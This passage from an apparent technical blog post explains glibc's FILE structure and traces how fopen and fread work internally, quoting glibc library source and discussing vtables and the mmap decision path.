  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
  __off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};

Before starting to describe each field of the structure, you have to understand that according to behaviour of the function that uses a file stream, only a small part of the _IO_FILE structure is used. For example if the file stream is byte oriented, _IO_wide_data related operations are not used.

Let's review the fields of the structure:

_flags: High-order word is _IO_MAGIC, rest is flags.
_IO_read_ptr address of input within the input buffer that has been already used.
_IO_read_end end address of the input buffer.
_IO_read_base base address of the input buffer.
_IO_write_base base address of the ouput buffer.
_IO_write_ptr points to the character that hasn’t been printed yet.
_IO_write_end end address of the output buffer.
_IO_buf_base base address for both input and output buffer.
_IO_buf_end end address for both input and output buffer.
_chain stands for the single linked list that links of all file streams.
_fileno stands for the file descriptor associated to the file.
_vtable_offset stands for the offset of the vtable we have to use.
_offset stands for the current offset within the file.

Common functions

_IO_setb (FILE *f, char *base, char *end, int do_user_buf): Initializes the base buffer. Here is its implementation:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/genops.c#L328

void
_IO_setb (FILE *f, char *b, char *eb, int a)
{
  if (f->_IO_buf_base && !(f->_flags & _IO_USER_BUF))
    free (f->_IO_buf_base);
  f->_IO_buf_base = b;
  f->_IO_buf_end = eb;
  if (a)
    f->_flags &= ~_IO_USER_BUF;
  else
    f->_flags |= _IO_USER_BUF;
}
libc_hidden_def (_IO_setb)

_IO_USER_BUF: Don't deallocate buffer on close.

_IO_setg(fp, base, current, end): Initializes read pointers. Here is its code:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/libioP.h#L520

#define _IO_setg(fp, eb, g, eg)  ((fp)->_IO_read_base = (eb),\
	(fp)->_IO_read_ptr = (g), (fp)->_IO_read_end = (eg))

fopen

Let's review the opening process of a file and how the _IO_FILE structure is intitialized. fopen is implemented in libio/iofopen.c:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/iofopen.c#L83
FILE *
_IO_new_fopen (const char *filename, const char *mode)
{
  return __fopen_internal (filename, mode, 1);
}

strong_alias (_IO_new_fopen, __new_fopen)
versioned_symbol (libc, _IO_new_fopen, _IO_fopen, GLIBC_2_1);
versioned_symbol (libc, __new_fopen, fopen, GLIBC_2_1);

# if !defined O_LARGEFILE || O_LARGEFILE == 0
weak_alias (_IO_new_fopen, _IO_fopen64)
weak_alias (_IO_new_fopen, fopen64)
# endif

Then it calls __fopen_internal:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/iofopen.c#L56
FILE *
__fopen_internal (const char *filename, const char *mode, int is32)
{
  struct locked_FILE
  {
    struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
    _IO_lock_t lock;
#endif
    struct _IO_wide_data wd;
  } *new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));

  if (new_f == NULL)
    return NULL;
#ifdef _IO_MTSAFE_IO
  new_f->fp.file._lock = &new_f->lock;
#endif
  _IO_no_init (&new_f->fp.file, 0, 0, &new_f->wd, &_IO_wfile_jumps);
  _IO_JUMPS (&new_f->fp) = &_IO_file_jumps;
  _IO_new_file_init_internal (&new_f->fp);
  if (_IO_file_fopen ((FILE *) new_f, filename, mode, is32) != NULL)
    return __fopen_maybe_mmap (&new_f->fp.file);

  _IO_un_link (&new_f->fp);
  free (new_f);
  return NULL;
}

First, a struct locked_FILE is allocated on the heap. _IO_no_init -- and _IO_old_init within it -- null out the structure:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/genops.c#L561
void
_IO_no_init (FILE *fp, int flags, int orientation,
	     struct _IO_wide_data *wd, const struct _IO_jump_t *jmp)
{
  _IO_old_init (fp, flags);
  fp->_mode = orientation;
  if (orientation >= 0)
    {
      fp->_wide_data = wd;
      fp->_wide_data->_IO_buf_base = NULL;
      fp->_wide_data->_IO_buf_end = NULL;
      fp->_wide_data->_IO_read_base = NULL;
      fp->_wide_data->_IO_read_ptr = NULL;
      fp->_wide_data->_IO_read_end = NULL;
      fp->_wide_data->_IO_write_base = NULL;
      fp->_wide_data->_IO_write_ptr = NULL;
      fp->_wide_data->_IO_write_end = NULL;
      fp->_wide_data->_IO_save_base = NULL;
      fp->_wide_data->_IO_backup_base = NULL;
      fp->_wide_data->_IO_save_end = NULL;

      fp->_wide_data->_wide_vtable = jmp;
    }
  else
    /* Cause predictable crash when a wide function is called on a byte
       stream.  */
    fp->_wide_data = (struct _IO_wide_data *) -1L;
  fp->_freeres_list = NULL;
}

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/genops.c#L530

void
_IO_old_init (FILE *fp, int flags)
{
  fp->_flags = _IO_MAGIC|flags;
  fp->_flags2 = 0;
  if (stdio_needs_locking)
    fp->_flags2 |= _IO_FLAGS2_NEED_LOCK;
  fp->_IO_buf_base = NULL;
  fp->_IO_buf_end = NULL;
  fp->_IO_read_base = NULL;
  fp->_IO_read_ptr = NULL;
  fp->_IO_read_end = NULL;
  fp->_IO_write_base = NULL;
  fp->_IO_write_ptr = NULL;
  fp->_IO_write_end = NULL;
  fp->_chain = NULL; /* Not necessary. */

  fp->_IO_save_base = NULL;
  fp->_IO_backup_base = NULL;
  fp->_IO_save_end = NULL;
  fp->_markers = NULL;
  fp->_cur_column = 0;
#if _IO_JUMPS_OFFSET
  fp->_vtable_offset = 0;
#endif
#ifdef _IO_MTSAFE_IO
  if (fp->_lock != NULL)
    _IO_lock_init (*fp->_lock);
#endif
}

Then it initializes the vtable field field to &_IO_file_jumps initialized in /source/libio/fileops.c#L1432:

// /source/libio/fileops.c#L1432


const struct _IO_jump_t _IO_file_jumps libio_vtable =
{
  JUMP_INIT_DUMMY,
  JUMP_INIT(finish, _IO_file_finish),
  JUMP_INIT(overflow, _IO_file_overflow),
  JUMP_INIT(underflow, _IO_file_underflow),
  JUMP_INIT(uflow, _IO_default_uflow),
  JUMP_INIT(pbackfail, _IO_default_pbackfail),
  JUMP_INIT(xsputn, _IO_file_xsputn),
  JUMP_INIT(xsgetn, _IO_file_xsgetn),
  JUMP_INIT(seekoff, _IO_new_file_seekoff),
  JUMP_INIT(seekpos, _IO_default_seekpos),
  JUMP_INIT(setbuf, _IO_new_file_setbuf),
  JUMP_INIT(sync, _IO_new_file_sync),
  JUMP_INIT(doallocate, _IO_file_doallocate),
  JUMP_INIT(read, _IO_file_read),
  JUMP_INIT(write, _IO_new_file_write),
  JUMP_INIT(seek, _IO_file_seek),
  JUMP_INIT(close, _IO_file_close),
  JUMP_INIT(stat, _IO_file_stat),
  JUMP_INIT(showmanyc, _IO_default_showmanyc),
  JUMP_INIT(imbue, _IO_default_imbue)
};
libc_hidden_data_def (_IO_file_jumps)

Most of the intialization stuff stands in the _IO_new_file_init_internal function:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/fileops.c#L105

void
_IO_new_file_init_internal (struct _IO_FILE_plus *fp)
{
  /* POSIX.1 allows another file handle to be used to change the position
     of our file descriptor.  Hence we actually don't know the actual
     position before we do the first fseek (and until a following fflush). */
  fp->file._offset = _IO_pos_BAD;
  fp->file._flags |= CLOSED_FILEBUF_FLAGS;

  _IO_link_in (fp);
  fp->file._fileno = -1;
}

fp->file._flags is initialized to CLOSED_FILEBUF_FLAGS which means according to its definition:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/fileops.c#L100

#define CLOSED_FILEBUF_FLAGS \
  (_IO_IS_FILEBUF+_IO_NO_READS+_IO_NO_WRITES+_IO_TIED_PUT_GET)

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/libio.h#L78
#define _IO_TIED_PUT_GET      0x0400 /* Put and get pointer move in unison.  */

Then the fp (the file pointer) is linked into the single linked list that keeps track of every file stream, for which the HEAD is _IO_list_all. _IO_link_in is defined like this:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/genops.c#L86

void
_IO_link_in (struct _IO_FILE_plus *fp)
{
  if ((fp->file._flags & _IO_LINKED) == 0)
    {
      fp->file._flags |= _IO_LINKED;
#ifdef _IO_MTSAFE_IO
      _IO_cleanup_region_start_noarg (flush_cleanup);
      _IO_lock_lock (list_all_lock);
      run_fp = (FILE *) fp;
      _IO_flockfile ((FILE *) fp);
#endif
      fp->file._chain = (FILE *) _IO_list_all;
      _IO_list_all = fp;
#ifdef _IO_MTSAFE_IO
      _IO_funlockfile ((FILE *) fp);
      run_fp = NULL;
      _IO_lock_unlock (list_all_lock);
      _IO_cleanup_region_end (0);
#endif
    }
}
libc_hidden_def (_IO_link_in)

Once it has been initialized, _IO_file_fopen is called to open the file with the right file and mode. Here is its definition:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/fileops.c#L211

FILE *
_IO_new_file_fopen (FILE *fp, const char *filename, const char *mode,
		    int is32not64)
{
  int oflags = 0, omode;
  int read_write;
  int oprot = 0666;
  int i;
  FILE *result;
  const char *cs;
  const char *last_recognized;

  if (_IO_file_is_open (fp))
    return 0;
  switch (*mode)
    {
    case 'r':
      omode = O_RDONLY;
      read_write = _IO_NO_WRITES;
      break;
    case 'w':
      omode = O_WRONLY;
      oflags = O_CREAT|O_TRUNC;
      read_write = _IO_NO_READS;
      break;
    case 'a':
      omode = O_WRONLY;
      oflags = O_CREAT|O_APPEND;
      read_write = _IO_NO_READS|_IO_IS_APPENDING;
      break;
    default:
      __set_errno (EINVAL);
      return NULL;
    }
  last_recognized = mode;
  for (i = 1; i < 7; ++i)
    {
      switch (*++mode)
	{
	case '\0':
	  break;
	case '+':
	  omode = O_RDWR;
	  read_write &= _IO_IS_APPENDING;
	  last_recognized = mode;
	  continue;
	case 'x':
	  oflags |= O_EXCL;
	  last_recognized = mode;
	  continue;
	case 'b':
	  last_recognized = mode;
	  continue;
	case 'm':
	  fp->_flags2 |= _IO_FLAGS2_MMAP;
	  continue;
	case 'c':
	  fp->_flags2 |= _IO_FLAGS2_NOTCANCEL;
	  continue;
	case 'e':
	  oflags |= O_CLOEXEC;
	  fp->_flags2 |= _IO_FLAGS2_CLOEXEC;
	  continue;
	default:
	  /* Ignore.  */
	  continue;
	}
      break;
    }

  result = _IO_file_open (fp, filename, omode|oflags, oprot, read_write,
			  is32not64);

  if (result != NULL)
    {
      /* Test whether the mode string specifies the conversion.  */
      cs = strstr (last_recognized + 1, ",ccs=");
      if (cs != NULL)
	{
	  /* Yep.  Load the appropriate conversions and set the orientation
	     to wide.  */
	  struct gconv_fcts fcts;
	  struct _IO_codecvt *cc;
	  char *endp = __strchrnul (cs + 5, ',');
	  char *ccs = malloc (endp - (cs + 5) + 3);

	  if (ccs == NULL)
	    {
	      int malloc_err = errno;  /* Whatever malloc failed with.  */
	      (void) _IO_file_close_it (fp);
	      __set_errno (malloc_err);
	      return NULL;
	    }

	  *((char *) __mempcpy (ccs, cs + 5, endp - (cs + 5))) = '\0';
	  strip (ccs, ccs);

	  if (__wcsmbs_named_conv (&fcts, ccs[2] == '\0'
				   ? upstr (ccs, cs + 5) : ccs) != 0)
	    {
	      /* Something went wrong, we cannot load the conversion modules.
		 This means we cannot proceed since the user explicitly asked
		 for these.  */
	      (void) _IO_file_close_it (fp);
	      free (ccs);
	      __set_errno (EINVAL);
	      return NULL;
	    }

	  free (ccs);

	  assert (fcts.towc_nsteps == 1);
	  assert (fcts.tomb_nsteps == 1);

	  fp->_wide_data->_IO_read_ptr = fp->_wide_data->_IO_read_end;
	  fp->_wide_data->_IO_write_ptr = fp->_wide_data->_IO_write_base;

	  /* Clear the state.  We start all over again.  */
	  memset (&fp->_wide_data->_IO_state, '\0', sizeof (__mbstate_t));
	  memset (&fp->_wide_data->_IO_last_state, '\0', sizeof (__mbstate_t));

	  cc = fp->_codecvt = &fp->_wide_data->_codecvt;

	  cc->__cd_in.step = fcts.towc;

	  cc->__cd_in.step_data.__invocation_counter = 0;
	  cc->__cd_in.step_data.__internal_use = 1;
	  cc->__cd_in.step_data.__flags = __GCONV_IS_LAST;
	  cc->__cd_in.step_data.__statep = &result->_wide_data->_IO_state;

	  cc->__cd_out.step = fcts.tomb;

	  cc->__cd_out.step_data.__invocation_counter = 0;
	  cc->__cd_out.step_data.__internal_use = 1;
	  cc->__cd_out.step_data.__flags = __GCONV_IS_LAST | __GCONV_TRANSLIT;
	  cc->__cd_out.step_data.__statep = &result->_wide_data->_IO_state;

	  /* From now on use the wide character callback functions.  */
	  _IO_JUMPS_FILE_plus (fp) = fp->_wide_data->_wide_vtable;

	  /* Set the mode now.  */
	  result->_mode = 1;
	}
    }

  return result;
}
libc_hidden_ver (_IO_new_file_fopen, _IO_file_fopen)

That's a pretty huge function but most of it is just parsing and handling of a specific encoding for the file. First it checks if the file is already open then it parses the mode and once it's done it calls _IO_file_open with the right flags. Then is the file requires a specific encoding it intitializes _wide_data and so on to properly handle it. Let's take a look at the _IO_file_open function:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/fileops.c#L180

FILE *
_IO_file_open (FILE *fp, const char *filename, int posix_mode, int prot,
	       int read_write, int is32not64)
{
  int fdesc;
  if (__glibc_unlikely (fp->_flags2 & _IO_FLAGS2_NOTCANCEL))
    fdesc = __open_nocancel (filename,
			     posix_mode | (is32not64 ? 0 : O_LARGEFILE), prot);
  else
    fdesc = __open (filename, posix_mode | (is32not64 ? 0 : O_LARGEFILE), prot);
  if (fdesc < 0)
    return NULL;
  fp->_fileno = fdesc;
  _IO_mask_flags (fp, read_write,_IO_NO_READS+_IO_NO_WRITES+_IO_IS_APPENDING);
  /* For append mode, send the file offset to the end of the file.  Don't
     update the offset cache though, since the file handle is not active.  */
  if ((read_write & (_IO_IS_APPENDING | _IO_NO_READS))
      == (_IO_IS_APPENDING | _IO_NO_READS))
    {
      off64_t new_pos = _IO_SYSSEEK (fp, 0, _IO_seek_end);
      if (new_pos == _IO_pos_BAD && errno != ESPIPE)
	{
	  __close_nocancel (fdesc);
	  return NULL;
	}
    }
  _IO_link_in ((struct _IO_FILE_plus *) fp);
  return fp;
}
libc_hidden_def (_IO_file_open)

If the mode doesn't allow the open process to be a cancellation point it calls __open_nocancel, else it calls __open. When the file is open, it initializes flags, file descriptor (fileno) and links the actual file pointer to the single linked list that stores every file stream (if that's not already the case).

Then we're back into __fopen_internal to call __fopen_maybe_mmap on the newly open file:

// https://elixir.bootlin.com/glibc/glibc-2.36/source/libio/iofopen.c#L34

FILE *
__fopen_maybe_mmap (FILE *fp)
{
#if _G_HAVE_MMAP
  if ((fp->_flags2 & _IO_FLAGS2_MMAP) && (fp->_flags & _IO_NO_WRITES))
    {
      /* Since this is read-only, we might be able to mmap the contents
	 directly.  We delay the decision until the first read attempt by
	 giving it a jump table containing functions that choose mmap or
	 vanilla file operations and reset the jump table accordingly.  */

      if (fp->_mode <= 0)
	_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps_maybe_mmap;
      else
	_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps_maybe_mmap;
      fp->_wide_data->_wide_vtable = &_IO_wfile_jumps_maybe_mmap;
    }
#endif
  return fp;
}

I think the comment is enough explicit, once __fopen_maybe_mmap is called the fp is returned given the file descriptor has properly been allocated, initialized and that the file is open. Else it means that there are some errors, then the fp is unlinked from the single linked that stores every file stream, and the locked_FILE is freed, returning NULL indicating an error.

That's basically how fopen works !

fread

Once a _IO_FILE structure has been initialized and linked into the _IO_list_all single linked list, several operations can occur. A basic primitive would be to read data from a file, that's what fread does with the use of certain fields of _IO_FILE.

Here is a basic description of what fread does, the schema comes from the incredible article of raycp.

<p align="center" width="100%"> fread algorithm.<br> <img width="80%" src="/pic/fread.png"> </br> </p>

According to the man: "The function fread() reads nmemb items of data, each size bytes long, from the stream pointed to by stream, storing them at the location given by ptr.". Now let's dig deeper within the code. fread is defined there:

// https://elixir.bootlin.com/glibc/latest/source/libio/iofread.c#L30

size_t
_IO_fread (void *buf, size_t size, size_t count, FILE *fp)
{
  size_t bytes_requested = size * count;
  size_t bytes_read;
  CHECK_FILE (fp, 0);
  if (bytes_requested == 0)
    return 0;
  _IO_acquire_lock (fp);
  bytes_read = _IO_sgetn (fp, (char *) buf, bytes_requested);
  _IO_release_lock (fp);
  return bytes_requested == bytes_read ? count : bytes_read / size;
}
libc_hidden_def (_IO_fread)

If the amount of requested bytes is null, zero is returned. CHECK_FILE checks (if IO_DEBUG is enabled) if fp exists and if fp->flags is properely structured:

// https://elixir.bootlin.com/glibc/latest/source/libio/libioP.h#L866

#ifdef IO_DEBUG
# define CHECK_FILE(FILE, RET) do {				\
    if ((FILE) == NULL						\
	|| ((FILE)->_flags & _IO_MAGIC_MASK) != _IO_MAGIC)	\
      {								\
	__set_errno (EINVAL);					\
	return RET;						\
      }								\
  } while (0)
#else
# define CHECK_FILE(FILE, RET) do { } while (0)
#endif

Then _IO_sgetn is called:

// https://elixir.bootlin.com/glibc/latest/source/libio/genops.c#L408

size_t
_IO_sgetn (FILE *fp, void *data, size_t n)
{
  /* FIXME handle putback buffer here! */
  return _IO_XSGETN (fp, data, n);
}
libc_hidden_def (_IO_sgetn)

When this is the first time _IO_sgetn is called, on most of the platforms (the one which support mmap) the vtable is initialized to _IO_file_jumps_maybe_mmap:

// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L1481

const struct _IO_jump_t _IO_file_jumps_maybe_mmap libio_vtable =
{
  JUMP_INIT_DUMMY,
  JUMP_INIT(finish, _IO_file_finish),
  JUMP_INIT(overflow, _IO_file_overflow),
  JUMP_INIT(underflow, _IO_file_underflow_maybe_mmap),
  JUMP_INIT(uflow, _IO_default_uflow),
  JUMP_INIT(pbackfail, _IO_default_pbackfail),
  JUMP_INIT(xsputn, _IO_new_file_xsputn),
  JUMP_INIT(xsgetn, _IO_file_xsgetn_maybe_mmap),
  JUMP_INIT(seekoff, _IO_file_seekoff_maybe_mmap),
  JUMP_INIT(seekpos, _IO_default_seekpos),
  JUMP_INIT(setbuf, (_IO_setbuf_t) _IO_file_setbuf_mmap),
  JUMP_INIT(sync, _IO_new_file_sync),
  JUMP_INIT(doallocate, _IO_file_doallocate),
  JUMP_INIT(read, _IO_file_read),
  JUMP_INIT(write, _IO_new_file_write),
  JUMP_INIT(seek, _IO_file_seek),
  JUMP_INIT(close, _IO_file_close),
  JUMP_INIT(stat, _IO_file_stat),
  JUMP_INIT(showmanyc, _IO_default_showmanyc),
  JUMP_INIT(imbue, _IO_default_imbue)
};

Which means _IO_sgetn calls _IO_file_xsgetn_maybe_mmap:

// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L1409

static size_t
_IO_file_xsgetn_maybe_mmap (FILE *fp, void *data, size_t n)
{
  /* We only get here if this is the first attempt to read something.
     Decide which operations to use and then punt to the chosen one.  */

  decide_maybe_mmap (fp);
  return _IO_XSGETN (fp, data, n);
}

decide_maybe_mmap is basicaly trying to map the file, if it succeeds the vtable is initialized to &_IO_file_jumps_mmap else it's initialized to &_IO_file_jumps. The function is pretty easy to read, except maybe for the S_ISREG (st.st_mode) && st.st_size != 0 that checks if it is a regular file and if its size isn't null. Here is the full code:

// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L658

static void
decide_maybe_mmap (FILE *fp)
{
  /* We use the file in read-only mode.  This could mean we can
     mmap the file and use it without any copying.  But not all
     file descriptors are for mmap-able objects and on 32-bit
     machines we don't want to map files which are too large since
     this would require too much virtual memory.  */
  struct __stat64_t64 st;

  if (_IO_SYSSTAT (fp, &st) == 0
      && S_ISREG (st.st_mode) && st.st_size != 0
      /* Limit the file size to 1MB for 32-bit machines.  */
      && (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024)
      /* Sanity check.  */
      && (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size))
    {
      /* Try to map the file.  */
      void *p;

      p = __mmap64 (NULL, st.st_size, PROT_READ, MAP_SHARED, fp->_fileno, 0);
      if (p != MAP_FAILED)
	{
	  /* OK, we managed to map the file.  Set the buffer up and use a
	     special jump table with simplified underflow functions which
	     never tries to read anything from the file.  */

	  if (__lseek64 (fp->_fileno, st.st_size, SEEK_SET) != st.st_size)
	    {
	      (void) __munmap (p, st.st_size);
	      fp->_offset = _IO_pos_BAD;
	    }
	  else
	    {
	      _IO_setb (fp, p, (char *) p + st.st_size, 0);

	      if (fp->_offset == _IO_pos_BAD)
		fp->_offset = 0;

	      _IO_setg (fp, p, p + fp->_offset, p + st.st_size);
	      fp->_offset = st.st_size;

	      if (fp->_mode <= 0)
		_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps_mmap;
	      else
		_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps_mmap;
	      fp->_wide_data->_wide_vtable = &_IO_wfile_jumps_mmap;

	      return;
	    }
	}
    }

  /* We couldn't use mmap, so revert to the vanilla file operations.  */

  if (fp->_mode <= 0)
    _IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps;
  else
    _IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
  fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
}

Two operations are very important to note in this function. First, _IO_setb (take a look at this) is called to initialize the begin of the base buffer to the begin of the memory mapping of the file, the end of the base buffer is then initialized to the end of the file (p + st.st_size). Right after _IO_setg (take a look at this) is called to initialize the read buffer of the file, the base of the read buffer is initialized to the mapping of the file, the current pointer to p + fp->_offset and the end of the buffer to the end of the file mapping.

Then according to what vtable is used, the xsgetn is distinct:

// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L1457

// vtable if the file is maped
const struct _IO_jump_t _IO_file_jumps_mmap libio_vtable =
{
  JUMP_INIT_DUMMY,
  JUMP_INIT(finish, _IO_file_finish),
  JUMP_INIT(overflow, _IO_file_overflow),
  JUMP_INIT(underflow, _IO_file_underflow_mmap),
  JUMP_INIT(uflow, _IO_default_uflow),
  JUMP_INIT(pbackfail, _IO_default_pbackfail),
  JUMP_INIT(xsputn, _IO_new_file_xsputn),
  JUMP_INIT(xsgetn, _IO_file_xsgetn_mmap),
  JUMP_INIT(seekoff, _IO_file_seekoff_mmap),
  JUMP_INIT(seekpos, _IO_default_seekpos),
  JUMP_INIT(setbuf, (_IO_setbuf_t) _IO_file_setbuf_mmap),
  JUMP_INIT(sync, _IO_file_sync_mmap),
  JUMP_INIT(doallocate, _IO_file_doallocate),
  JUMP_INIT(read, _IO_file_read),
  JUMP_INIT(write, _IO_new_file_write),
  JUMP_INIT(seek, _IO_file_seek),
  JUMP_INIT(close, _IO_file_close_mmap),
  JUMP_INIT(stat, _IO_file_stat),
  JUMP_INIT(showmanyc, _IO_default_showmanyc),
  JUMP_INIT(imbue, _IO_default_imbue)
};

// vanilla vtable
// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L1432
const struct _IO_jump_t _IO_file_jumps libio_vtable =
{
  JUMP_INIT_DUMMY,
  JUMP_INIT(finish, _IO_file_finish),
  JUMP_INIT(overflow, _IO_file_overflow),
  JUMP_INIT(underflow, _IO_file_underflow),
  JUMP_INIT(uflow, _IO_default_uflow),
  JUMP_INIT(pbackfail, _IO_default_pbackfail),
  JUMP_INIT(xsputn, _IO_file_xsputn),
  JUMP_INIT(xsgetn, _IO_file_xsgetn),
  JUMP_INIT(seekoff, _IO_new_file_seekoff),
  JUMP_INIT(seekpos, _IO_default_seekpos),
  JUMP_INIT(setbuf, _IO_new_file_setbuf),
  JUMP_INIT(sync, _IO_new_file_sync),
  JUMP_INIT(doallocate, _IO_file_doallocate),
  JUMP_INIT(read, _IO_file_read),
  JUMP_INIT(write, _IO_new_file_write),
  JUMP_INIT(seek, _IO_file_seek),
  JUMP_INIT(close, _IO_file_close),
  JUMP_INIT(stat, _IO_file_stat),
  JUMP_INIT(showmanyc, _IO_default_showmanyc),
  JUMP_INIT(imbue, _IO_default_imbue)
};
libc_hidden_data_def (_IO_file_jumps)

_IO_file_xsgetn_mmap

Let's first take a look at _IO_file_xsgetn_mmap:

// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L1364

static size_t
_IO_file_xsgetn_mmap (FILE *fp, void *data, size_t n)
{
  size_t have;
  char *read_ptr = fp->_IO_read_ptr;
  char *s = (char *) data;

  have = fp->_IO_read_end - fp->_IO_read_ptr;

  if (have < n)
    {
      if (__glibc_unlikely (_IO_in_backup (fp)))
	{
	  s = __mempcpy (s, read_ptr, have);
	  n -= have;
	  _IO_switch_to_main_get_area (fp);
	  read_ptr = fp->_IO_read_ptr;
	  have = fp->_IO_read_end - fp->_IO_read_ptr;
	}

      if (have < n)
	{
	  /* Check that we are mapping all of the file, in case it grew.  */
	  if (__glibc_unlikely (mmap_remap_check (fp)))
	    /* We punted mmap, so complete with the vanilla code.  */
	    return s - (char *) data + _IO_XSGETN (fp, data, n);

	  read_ptr = fp->_IO_read_ptr;
	  have = fp->_IO_read_end - read_ptr;
	}
    }

  if (have < n)
    fp->_flags |= _IO_EOF_SEEN;

  if (have != 0)
    {
      have = MIN (have, n);
      s = __mempcpy (s, read_ptr, have);
      fp->_IO_read_ptr = read_ptr + have;
    }

  return s - (char *) data;
}

// https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L541

/* Guts of underflow callback if we mmap the file.  This stats the file and
   updates the stream state to match.  In the normal case we return zero.
   If the file is no longer eligible for mmap, its jump tables are reset to
   the vanilla ones and we return nonzero.  */
static int
mmap_remap_check (FILE *fp)
{
  struct stat64 st;

  if (_IO_SYSSTAT (fp, &st) == 0
      && S_ISREG (st.st_mode) && st.st_size != 0
      /* Limit the file size to 1MB for 32-bit machines.  */
      && (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024))
    {
      const size_t pagesize = __getpagesize ();
# define ROUNDED(x)	(((x) + pagesize - 1) & ~(pagesize - 1))
      if (ROUNDED (st.st_size) < ROUNDED (fp->_IO_buf_end
					  - fp->_IO_buf_base))
	{
	  /* We can trim off some pages past the end of the file.  */
	  (void) __munmap (fp->_IO_buf_base + ROUNDED (st.st_size),
			   ROUNDED (fp->_IO_buf_end - fp->_IO_buf_base)
			   - ROUNDED (st.st_size));
	  fp->_IO_buf_end = fp->_IO_buf_base + st.st_size;
	}
      else if (ROUNDED (st.st_size) > ROUNDED (fp->_IO_buf_end
					       - fp->_IO_buf_base))
	{
	  /* The file added some pages.  We need to remap it.  */
	  void *p;
#if _G_HAVE_MREMAP
	  p = __mremap (fp->_IO_buf_base, ROUNDED (fp->_IO_buf_end
						   - fp->_IO_buf_base),
			ROUNDED (st.st_size), MREMAP_MAYMOVE);
	  if (p == MAP_FAILED)
	    {
	      (void) __munmap (fp->_IO_buf_base,
			       fp->_IO_buf_end - fp->_IO_buf_base);
	      goto punt;
	    }
#else
	  (void) __munmap (fp->_IO_buf_base,
			   fp->_IO_buf_end - fp->_IO_buf_base);
	  p = __mmap64 (NULL, st.st_size, PROT_READ, MAP_SHARED,
			fp->_fileno, 0);
	  if (p == MAP_FAILED)
	    goto punt;
#endif
	  fp->_IO_buf_base = p;
	  fp->_IO_buf_end = fp->_IO_buf_base + st.st_size;
	}
      else
	{
	  /* The number of pages didn't change.  */
	  fp->_IO_buf_end = fp->_IO_buf_base + st.st_size;
	}
# undef ROUNDED

      fp->_offset -= fp->_IO_read_end - fp->_IO_read_ptr;
      _IO_setg (fp, fp->_IO_buf_base,
		fp->_offset < fp->_IO_buf_end - fp->_IO_buf_base
		? fp->_IO_buf_base + fp->_offset : fp->_IO_buf_end,
		fp->_IO_buf_end);

      /* If we are already positioned at or past the end of the file, don't
	 change the current offset.  If not, seek past what we have mapped,
	 mimicking the position left by a normal underflow reading into its
	 buffer until EOF.  */

      if (fp->_offset < fp->_IO_buf_end - fp->_IO_buf_base)
	{
	  if (__lseek64 (fp->_fileno, fp->_IO_buf_end - fp->_IO_buf_base,
			 SEEK_SET)
	      != fp->_IO_buf_end - fp->_IO_buf_base)
	    fp->_flags |= _IO_ERR_SEEN;
	  else
	    fp->_offset = fp->_IO_buf_end - fp->_IO_buf_base;
	}

      return 0;
    }
  else
    {
      /* Life is no longer good for mmap.  Punt it.  */
      (void) __munmap (fp->_IO_buf_base,
		       fp->_IO_buf_end - fp->_IO_buf_base);
    punt:
      fp->_IO_buf_base = fp->_IO_buf_end = NULL;
      _IO_setg (fp, NULL, NULL, NULL);
      if (fp->_mode <= 0)
	_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps;
      else
	_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
      fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;

      return 1;
    }
}

